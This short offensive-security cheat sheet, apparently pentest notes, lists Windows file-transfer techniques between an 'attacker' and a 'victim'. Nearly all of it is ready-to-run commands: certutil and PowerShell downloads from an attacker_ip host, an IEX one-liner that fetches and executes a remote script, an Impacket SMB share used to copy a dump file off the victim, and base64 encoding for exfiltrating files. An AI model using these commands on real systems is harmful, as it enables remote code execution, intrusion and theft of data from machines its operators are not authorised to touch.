Windows File Transfer

Windows File Transfer

Upload file from attacker to victim

To use the certutil and powershell options, you need to host the files on your web server using python3 -m http.server

Certutil

Execute on victim cmd

certutil -urlcache -split -f http://attacker_ip:port/file.exe output.exe

Powershell IWR & Powershell IEX

Execute on victim powershell

iwr http://attacker_ip:port/file.exe -Output C:\ProgramData\file.exe

or

IEX(iwr -uri http://attacker_ip:port/file.ps1 -UseBasicParsing)

Download file from victim to attacker

Impacket-SMBServer

Execute on attacker shell

smbserver.py sharename . -smb2support -username user -password password

Execute on victim cmd

net use \\attacker_ip\sharename /user:user password
copy file.dmp \\attacker_ip\sharename

Base64

Note: If the file is relatively large, consider using this method carefully as it will produce a very long output. Execute on victim cmd

[Convert]::ToBase64String([IO.File]::ReadAllBytes('file_name'))

Execute on attacker shell

echo -n '<base64>' | base64 -d > victim_file